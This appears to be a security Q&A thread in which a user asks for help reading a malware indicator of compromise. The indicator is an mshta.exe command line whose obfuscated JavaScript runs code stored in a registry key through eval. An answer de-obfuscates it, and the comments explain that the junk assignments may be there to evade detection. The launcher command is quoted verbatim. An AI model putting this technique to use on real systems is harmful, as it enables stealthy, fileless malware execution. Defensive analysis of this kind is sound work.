-1

I have a IOC that has a command line argument that looks like this below. Wanted to see if someone could help me parse it out a little bit to understand what is happening.

C:\Windows\System32\mshta.exe javascript:GO3sOtu=BN1;Z0y=new%20ActiveXObject(WScript.Shell);Aer53IGv=BY5S;Quaj7=Z0y.RegRead(HKCU\\software\\najpigann\\hspi);RDYKO79Ji=0xq;eval(Quaj7);YWy5A0Za=Fl2JV;
rschapman
  • 3
  • 2

1 Answers1

1

mshta.exe parses web code to run.

If you take the Javascript and run it through a beautifier:

GO3sOtu = BN1;
Z0y = new ActiveXObject(WScript.Shell);
Aer53IGv = BY5S;
Quaj7 = Z0y.RegRead(HKCU\\ software\\ najpigann\\ hspi);
RDYKO79Ji = 0x q;
eval(Quaj7);
YWy5A0Za = Fl2JV;

At this point, it's simple to piece together the code flow:

eval(new ActiveXObject(WScript.Shell).RegRead(HKCU\software\najpigann\hspi))
schroeder
  • 123,438
  • 55
  • 284
  • 319
  • I understood the javascript was being passed and understood that mshta was parsing that. What I wasn't following are the items you listed and what they were doing. For example what is going on with the `GO3sOtu = BN1;` piece? That's what I was wanting to understand. I see the pieces that led to the item you put together. Is the rest just garbage? – rschapman Jul 11 '17 at 16:02
  • When posting, make sure you include the scope of the question, like the parts you understand and the parts you don't – schroeder Jul 11 '17 at 20:10
  • From a Javascript perspective, they do nothing. Either the IOC does not include all the other code (most likely), or it's included to try to evade detection. – schroeder Jul 11 '17 at 20:12
  • Noted on the question etiquette. Thanks for your help. – rschapman Jul 12 '17 at 02:17